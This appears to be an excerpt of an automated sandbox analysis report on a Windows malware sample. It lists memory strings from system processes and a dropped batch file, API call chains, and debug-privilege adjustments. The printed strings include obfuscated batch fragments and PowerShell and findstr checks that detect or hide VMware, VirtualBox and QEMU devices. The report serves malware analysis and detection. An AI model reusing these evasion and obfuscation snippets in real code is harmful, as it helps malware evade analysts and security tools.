%FrUHivOHfG%%BVbtvaespm%H%pJvKoXStv%%pdBxQKylxO%A%PmeCjPjMjlEcyckm%%gRPMlXmSzWEpFg%R%xnzxqhfhJGlTKbdu%%yZfGZhEpSKJTEwDe%D%ElDMVrbJffZdBQw%%YRFbmxfViywvofk%D%OYwRQTDIdXTcEl%%UnqFFYdAggIEw%I%GuaVspDtFLfoWXpE%%qWhChYzFJL%S%pLiogOxCThmW%%AIFzqbfkCcrHosywB%K%IDedUDRhiAM%%WeaubzsZoIGnNIQGR%"%ZgrREsIxObIi%%EyRgnHUqYdBbZXRqlM% %pMAFtfAIL%%LqrfPbOVCCZXfbd%/%PEuRgCpySgeSyaNZ%%MmMkVjWcvJj%c%sGzCCpVnTx%%bSnJWWwBPaO%:%OqGUuxOLTfn%%AEpWLRLpodKrHAa%"%ZhukDnKlW%%BQfMqWEMjsGzQ%W%ozeLGomTxILLLdWmT%%aqpVjCMOMU%D%IAzrvVeiZFI%%HsxaElBQWyC%S%zItpBYSBrCPh%%uphSeUysiICM%1%iCleujYaRNCOG%%NgPfDpOkVu%0%SDdhraQDZQpqnhFjl%%BEexSLlsCZwNXHQ%0%CFUSANLkG%%xQCYXgCHtPTv%T%rWYxRgmSIzgEZot%%OTTQIovPEb%2%kpnanhUDWBp%%eusPqwtYRjEFWZFddA%B%TQPcDvzSx%%LwAyZPvpze%0%lcybLHenBRz%%twdosOtRDVTgMd%A%XkjNEvOHN%%aSNuFWmlbhcVA%"%AfnPqiso%%BgcseVZEOqXrWGwY% %HVLWdcKgmyiZrEYMk%%oCEhpbCnFDME%>%RQrBwDKxesmS%%RFxLYFMu
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000003.2262721455.00000205FBEAD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000002F.00000000.2338645845.000001C781E40000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 0000001A.00000002.3608721089.00000205FBFA5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: -48vmci
Source: powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 0!hsVASNsaoExUOCVCfIBRpOoHUVuBIZuGmvQQakDOSOkwWDFTizmktCotdoFWsRsokRHtLfCVfNZBDSKrqBsiNjmJgxMMEGvawVlfVl! "J%yQvQpIocDcayfaVdbtehTzSDQUQfPHpIPrlfskSGDfmJZDroKAouTuQZXSauRjnWMsJNOQ%V%KQAyENmjDmCBvosVPuBmhAkxOuSqXGUEzTQxTuPcMOpNSqNYDQDomCIkGdKkVWlWrYbByV%O%cuEyAskwFxGTMgdGrXkFQQKFhPCswTomAIOiJNcpZkxmDbkfSKGeqSelKZqKQSZLjuserV%a%WDUVGGsxbgFxzLnjVIDCyKxrzhkMcjIfNXNcjvmxTnYkfssnxayKBPxmgCvzwFuRxAKBXk%h%ZAwfJkLmmgOWocKYEYABWGZNbnSgNEIQpnaYovfmBUqoKzrrgzVLbwosAJevsFzHyXGbcM%o%JjSoacqLcBWAZoJWPTYIyFqKTVuIQMTqpuPMTMwmbOGDyRFkYBiNctoeShueHIVqIGkFzW%R%ddwLGJYMlbqkJoEfnWgKTLrsFtTqVSHaLcyerrNEggWtNxYGMCtoyOcrLdgmPIRtuqyHPz%i%OWiBENPYFivmDtzsBWZhsnlAPxoDYxYqRnNxgXkpBNyXRDeyTcPBIIgALHMgymaijevqFc%Q%mDLJFFPnJlsQJWHwIjgmLykeQoNqNNhOSRPlQYcALxYANHDdANvljsqNtHTrRyzWeEYRgw%L%GKhGAoAKqjLJQarWEABcRifLImXcwiJLWdgLeDRbmIqJFiIzEhayqeEyEwXnqynizZNMUG%a%RbIzPiSvfAEyxoilvSyIgIFDLOvijGuVEYqYPRpvFjqwJRbZZoEUomzjveNbNKlzfIUzXk%c%vECccXrjUUNviVbAHsyhDLdoIVXRqbXBbPSZslkCRmkTosBqxFaBaQGKBougZASSWlutcb%w%hviWprAjaquHtKavBkihyeRdCrtrXcXhnvyEtdApkrneLsghSAJjkUDdEeuYXimXsmuYmv%o%cyKSXhQMrjllzwtNXsSuaoIBrbfqMzYiVwxlzrXvnRMkNMIPEEpbfSvOPiBWbAaSlcqdYi%F%oFvwhiBxOFsqMhjWccbJvrQauNRUZKwFQwqKGIKmmrtVDLNTIpancpMXOucurHydjNzqRz%D%ptsOweXUxIZXlJKiDBJtWmGqVFTqMQlxcjZGVoSIZTXtvtvOtajYGxDdNbSRkGiGwBVcKd%p%npIbtcpnVCkeWMGnREGWTTvbxsLqWTxteqNUpFeAOzfqGgKvZjKrvOjtTHDaqYqceRZGZM%N%YlAfhtOfuqIpqNjgXqgtaHbdjPjdlPhdwnlyRqGPFOnnsbIDSYUJAFLqkwWskKUEjFScBL%Y%oHKqOmuOLihFlmVxCRCVnutnEUTJdMiFbhJmYjRyVwLOlFzHILcbAGxUnwMTtLKYZBDeCI%C%ytadZRIFcZvmarJhfvJPZCxXfkLNOJcveZmJawHGlHtMxhLsoRwiuNIWVcYPfVRtXahaea%=m%INcDsiKAYztyWnTaqqqOYySBqQaPxZKnoKNuskqNkCZpMwUfdaQJO%p%lijVAnBiUcYOfklzzHgaCDvyCPTWUMwjbzcCEyRXPFqzbBGmIGEsJ%%JmIMKsLtFniFPNGhJVaQjlWnWxbiGooiezsmuPTfgDjsiTlNafYLD%r%BAypvQnrCNqZZBqvtNTbUKFbEfdlniBpCFCYTXYZFODQTsisVsGse%e%JIRUxLqNbdulbwuYrBwOUwggPhlWKqVBilTWKdwmImEKjESWNtERk%%EknCLfpztcKiScPCynnekfIRvXkppjrMdrEaGuZYhMpkTBrBctofq%s%MZyCvgNVZkjKYeAxOWenpWxQyYUGInVUlvrsgykomciCfzUxQdnwk%s%SbQBIexlhnLopzDNirqMPbmOVKYdwPEayJttBQxuMcePwnQarJIMX%%KvQObGXfuPsILQFfjmrTVZNXxrHUYMNgSdNoDFzjApsnLgKxkUhwq%i%SbLHSrJZdgHblQIcqCENhtGGAlqGkJeEqQZbcHKnPkxiKlApcvUsC%%JiyvehHacOtcdLvQGZJSqXXWyWoLbEOPLbGHBGYzdnMvdfHAezvvk%o%AmMlCXiSVZyaDqbeOpabjOckBSsoOGBjtFlPUvZJPHhoovAOFwqju%*%uaLjBKJETeoxpGYfljsqrlCGOWfsEIsqsOZEAFtKpfVCTRZPCJtmX%n%TdixevEFrZlMXeBHtEGQHbmpZNXXqPVoftzKQgvkOfXfKQVMyhieN%"
Source: $rbx-CO2.bat.10.dr	Binary or memory string: !vSVtsHijEsjvpxMOmAmzbHsRTCDfizfTtXiViBiYYvIuIXRhEXLGSZAOAezQecbenpbrpQFKroBGZXiWKvBkOyauxuvecsTVt! "V%BEiUjwptKYoUHUAlXSgqgkpGjKfMqbHwZqFXTlKjAKBktVDgfzYPkakqoCLy%h%rCcJqRVrpDrLhWPwJfnnhYGRdSmYfoIrzmSXHSTBamRChmInlOHjpyrsWlFy%t%FWlaUalVeSPRlLnUgdKRkZNqHybbVzbwmvVdaRIhaMisZQYDlwmSAOoGjVtv%b%YkZFQsEQPjUpvCQxQurQAyQzniVygpTfxmjPMDCGmhNbCWxYXRQODCUzuArI%X%xfKAqORitaKmSLEtKOWqLWBpzfBVrJvmlTigxnLNeoFWhDWSYBPFEbWADuak%p%nWRJFyaYCxVxdjlwrFiViIXQUPHkWICcmAzixVqIDXqAFrCuPAiYmfbEZbPP%N%QQbTUTkCJdYwozslrwkCmnuwzEQhyVjwfASNVwFMhaKMBMKNMQmCQnDCvFuq%q%dceOTCqNHEqVQyvmCIVMTcuIIHGSXpspbpIeVWTYvXgizrLsSqaNKIwaHvgm%H%WyPrmaTBPqqGPWqWWmiqVnZHpEFtSIwzPGcXhOVzxkDBZtYNrAdvnPrIyicH%g%uzJgTQQiTtOirISLKxHVGScrEbmaptyZMnfYAwIjCPUXLVdFWFYaBgaCxrBR%C%EQTAVPvdDUknPxsRXeGJYGdJvxxGmCAjUQEMVucVzZbbvKldNjEsKSTXMkey%c%sPRauatYTGVDcKkYFbnKluSdYiycXGZLpDDJibHurmkhnapaHUsLWumYXNcl%g%BqbmGkoyhBQDtStZkKQXSyucooOUrFLuYwTalXBcLQSgeOrdbnNmXetcWYYr%T%vthBPvFXZsNmjNlbFnYzXKTeRzxTcQemZjHsJrrIjteIzBckTrxIayuKAcKq%F%YLVjnBmagTsoWpqDGkEpwmaLtwlBOWSGGbJyyVvYocdaZiLLiRepyuULKkPR%Q%pLljbMHVFReKPGatjaLkKAtWRCimhYNofDJDQTYnAQfqNtzRtACKyFgOspsy%d%DvOHePFlWxDpbyKUvcjycqSGvdQAxUlBBAJebxmXOnVWXmIZVlspfTvnDhma%l%YfOblbNBPFSXQlKPvVJivRFlCWwIevBUllYJyTLVzhkpsvzTjGSHydFhzDzp%j%FfwteYMEnbqCkOJoGpShxCzyDTviGQjVtwptKQluIUGhqqxJtrAkLsRdGYPl%H%CEYwSuiOyqDQeyyCWrinvMOoqYjaEmMMbaReWjpVhJldNKfnUpgpPBPQPJgT%Q%lhjmDROeHuGMbmgMAKBFTVgpfxWzlaondwJZzYAWVbGAIunDvcqeiAZpbUgf%l%UpTGfsIEDgnBkEJRpGGLkteiKjfDwuYFSubGiZuqLIZpPOTDRiaunuVBkKWW%b%nfiihHJQCcJpmqaBtOtVpBMouErxyAvxcycGARhhedbOzKiXuuiwqaGLsTOD%G%plsbGlmOntbCGmRmAXPJvucesZhcRrnGcERSLZhnxuJatFPejukvefhVjnJG%K%ekWVguAcvZABPBlbKcLMkcSwgSBWxWJxpAjmxNUYfNJkTJFDTfkgCWwbsAPo%V%TDEzpdlprYEWhNGxtICwmYdsLCVteiUWYFfCikUQyqlUAnYPpZHJXsbUzmNN%I%hRkjeIYCIeojNMYWNjSxDgdeBlZFDkcWwhIGfcQRpwglLxVluehquqjbOgIS%q%JsYxbrMGdrRKsaigZStdpNlzcMCgYHSZuXiWyJjtLphdnwXticcWMEDVhzup%r%PGIvzSqvRlIqIZsZGhlGOiYVFVmPtnPZoUEeHLDufCCWtLoMmDpZnOAGIMQD%=)%BbDvJbNvnsUEQAlGbBTHzCQYPLAuXwUVaODBYBKKAqZlvvwnpaGkWVgZlFGXBtyRxYDc%;%XKHARjgiCFDupmeWPJYeIEqsUMihSiNwRuqEtgtNOXwFclIpoCbNazttuoFebZquRgDU%%WACJqkpKhKqJdTTpgZvraXkeBoMPGcNVIOsOZsxPjIlJXWbhgaoSKlTZpyibyzefWvap%$%AeqOBGhsLAgEnEJGNVkxUtyBkwqJEgNCVLHbKzqedBnPrDNUQyrakCuhGPDfpyOFMEJB%z%XIVoFfutfIkHJwTgPMrsqzuVVkPFNIcNTlXiCdveibbXFWwSEHQamqlxnZsuqPGxGwNx%X%zLDLqmkpywqZOWafScADazUCLbOtuErijYtTeeJZgVYQJsGuOBEEWjxZQbapyRUUfiPP%H%ChbNsBwfBeTsvtETZNlaBtcdduApaeLBDQRHzRmuMsyMhIUfmbVsWPnjeYKXbhewtsOE%y%CWtiBRnjUqVvAvcZjsEODICBgotFnbtPUpCpHNQeBdoOdpxFefnaNZbUtSbmyIWTWfBk%N%SMrwBznztOyRRNAiOtcUoIWPLEGThvRXOmNrNRynMCAFtjvKhOfDdGWjQCKXSurYXAdE%.%aiuWUOhMiqwBiWLtqnUhqDBlgAvskCISgRKZtiIoykbzgiPWIYHJGWowHjPutPCFIDvr%C%lMZhEFIgCbeYLyJlUYmkCorksoVJHvRCNxKWZzeaniTGeRIUfqLKrkOXuPPpKZyhjBkn%o%NNmuTmXtuLfBFbDrJglCJNCkKOpnKMwCGvgseqQenuDIJoJJvgxdqHEakcKfWJJIpCUk%p%UlmtqgpojTAweGSDotmZRghcGLiELVthtzPkTdMjsqQrBnaqRftVpUsOdkNFYKCoztcF%y%RHJkHdGBpQAsKRNFByRzgahJqgkHNCRiluzjviomnRznJuUgXXNbBDyQAaUATZONZsgq%"
Source: svchost.exe, 0000001A.00000003.2252800824.00000205FBA03000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000000F.00000002.3611901630.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: PointVMware&P
Source: svchost.exe, 0000001A.00000000.2251599001.00000205FBA12000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: svchost.exe, 0000002F.00000002.3530307254.000001C781E5B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000014.00000003.2263746615.000001428A8D4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.2213216986.000001428A8D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3602584883.000001428A8D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW!
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
Source: lsass.exe, 00000009.00000000.2134237170.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3525694016.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3530568510.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.2149953039.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.2218852747.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3526330854.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3516460450.000001CA97833000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.2221059381.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.2229065893.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3532761830.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.2246600077.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 0000002F.00000002.3530307254.000001C781E5B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 0000002F.00000002.3526443204.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmd.exe, 0000000D.00000003.2186067326.000001929143F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.2185864569.000001929143F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: svchost.exe, 00000014.00000002.3602287571.000001428A8AF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 0000001A.00000003.2258882189.00000205FB954000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000000C.00000000.2153480969.00000195DD66A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000002F.00000000.2338595191.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000024.00000002.3520920288.000001B278E02000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000009.00000000.2134355094.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: $rbx-CO2.bat.10.dr	Binary or memory string: !hsVASNsaoExUOCVCfIBRpOoHUVuBIZuGmvQQakDOSOkwWDFTizmktCotdoFWsRsokRHtLfCVfNZBDSKrqBsiNjmJgxMMEGvawVlfVl! "J%yQvQpIocDcayfaVdbtehTzSDQUQfPHpIPrlfskSGDfmJZDroKAouTuQZXSauRjnWMsJNOQ%V%KQAyENmjDmCBvosVPuBmhAkxOuSqXGUEzTQxTuPcMOpNSqNYDQDomCIkGdKkVWlWrYbByV%O%cuEyAskwFxGTMgdGrXkFQQKFhPCswTomAIOiJNcpZkxmDbkfSKGeqSelKZqKQSZLjuserV%a%WDUVGGsxbgFxzLnjVIDCyKxrzhkMcjIfNXNcjvmxTnYkfssnxayKBPxmgCvzwFuRxAKBXk%h%ZAwfJkLmmgOWocKYEYABWGZNbnSgNEIQpnaYovfmBUqoKzrrgzVLbwosAJevsFzHyXGbcM%o%JjSoacqLcBWAZoJWPTYIyFqKTVuIQMTqpuPMTMwmbOGDyRFkYBiNctoeShueHIVqIGkFzW%R%ddwLGJYMlbqkJoEfnWgKTLrsFtTqVSHaLcyerrNEggWtNxYGMCtoyOcrLdgmPIRtuqyHPz%i%OWiBENPYFivmDtzsBWZhsnlAPxoDYxYqRnNxgXkpBNyXRDeyTcPBIIgALHMgymaijevqFc%Q%mDLJFFPnJlsQJWHwIjgmLykeQoNqNNhOSRPlQYcALxYANHDdANvljsqNtHTrRyzWeEYRgw%L%GKhGAoAKqjLJQarWEABcRifLImXcwiJLWdgLeDRbmIqJFiIzEhayqeEyEwXnqynizZNMUG%a%RbIzPiSvfAEyxoilvSyIgIFDLOvijGuVEYqYPRpvFjqwJRbZZoEUomzjveNbNKlzfIUzXk%c%vECccXrjUUNviVbAHsyhDLdoIVXRqbXBbPSZslkCRmkTosBqxFaBaQGKBougZASSWlutcb%w%hviWprAjaquHtKavBkihyeRdCrtrXcXhnvyEtdApkrneLsghSAJjkUDdEeuYXimXsmuYmv%o%cyKSXhQMrjllzwtNXsSuaoIBrbfqMzYiVwxlzrXvnRMkNMIPEEpbfSvOPiBWbAaSlcqdYi%F%oFvwhiBxOFsqMhjWccbJvrQauNRUZKwFQwqKGIKmmrtVDLNTIpancpMXOucurHydjNzqRz%D%ptsOweXUxIZXlJKiDBJtWmGqVFTqMQlxcjZGVoSIZTXtvtvOtajYGxDdNbSRkGiGwBVcKd%p%npIbtcpnVCkeWMGnREGWTTvbxsLqWTxteqNUpFeAOzfqGgKvZjKrvOjtTHDaqYqceRZGZM%N%YlAfhtOfuqIpqNjgXqgtaHbdjPjdlPhdwnlyRqGPFOnnsbIDSYUJAFLqkwWskKUEjFScBL%Y%oHKqOmuOLihFlmVxCRCVnutnEUTJdMiFbhJmYjRyVwLOlFzHILcbAGxUnwMTtLKYZBDeCI%C%ytadZRIFcZvmarJhfvJPZCxXfkLNOJcveZmJawHGlHtMxhLsoRwiuNIWVcYPfVRtXahaea%=m%INcDsiKAYztyWnTaqqqOYySBqQaPxZKnoKNuskqNkCZpMwUfdaQJO%p%lijVAnBiUcYOfklzzHgaCDvyCPTWUMwjbzcCEyRXPFqzbBGmIGEsJ%%JmIMKsLtFniFPNGhJVaQjlWnWxbiGooiezsmuPTfgDjsiTlNafYLD%r%BAypvQnrCNqZZBqvtNTbUKFbEfdlniBpCFCYTXYZFODQTsisVsGse%e%JIRUxLqNbdulbwuYrBwOUwggPhlWKqVBilTWKdwmImEKjESWNtERk%%EknCLfpztcKiScPCynnekfIRvXkppjrMdrEaGuZYhMpkTBrBctofq%s%MZyCvgNVZkjKYeAxOWenpWxQyYUGInVUlvrsgykomciCfzUxQdnwk%s%SbQBIexlhnLopzDNirqMPbmOVKYdwPEayJttBQxuMcePwnQarJIMX%%KvQObGXfuPsILQFfjmrTVZNXxrHUYMNgSdNoDFzjApsnLgKxkUhwq%i%SbLHSrJZdgHblQIcqCENhtGGAlqGkJeEqQZbcHKnPkxiKlApcvUsC%%JiyvehHacOtcdLvQGZJSqXXWyWoLbEOPLbGHBGYzdnMvdfHAezvvk%o%AmMlCXiSVZyaDqbeOpabjOckBSsoOGBjtFlPUvZJPHhoovAOFwqju%*%uaLjBKJETeoxpGYfljsqrlCGOWfsEIsqsOZEAFtKpfVCTRZPCJtmX%n%TdixevEFrZlMXeBHtEGQHbmpZNXXqPVoftzKQgvkOfXfKQVMyhieN%"
Source: svchost.exe, 0000002F.00000000.2338595191.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000000.2260593598.00000205FD343000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: cmd.exe, 0000000D.00000003.2167756120.000001929145C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: svchost.exe, 0000000C.00000002.3537889353.00000195DD66A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node			graph_7-616
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node			graph_7-702

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000001E85898CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_000001E85898CD80

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000001E858981E3C LoadLibraryA,GetProcAddress,SleepEx,

8_2_000001E858981E3C

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140001CF0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModulesEx,ReadProcessMemory,CloseHandle,GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,

7_2_0000000140001CF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E85898CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001E85898CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001E8589884B0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E858988814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_000001E858988814
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589BCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001E8589BCD80
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589B84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001E8589B84B0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589B8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_000001E8589B8814
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001E8589ECD80
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001E8589E84B0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001E8589E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_000001E8589E8814
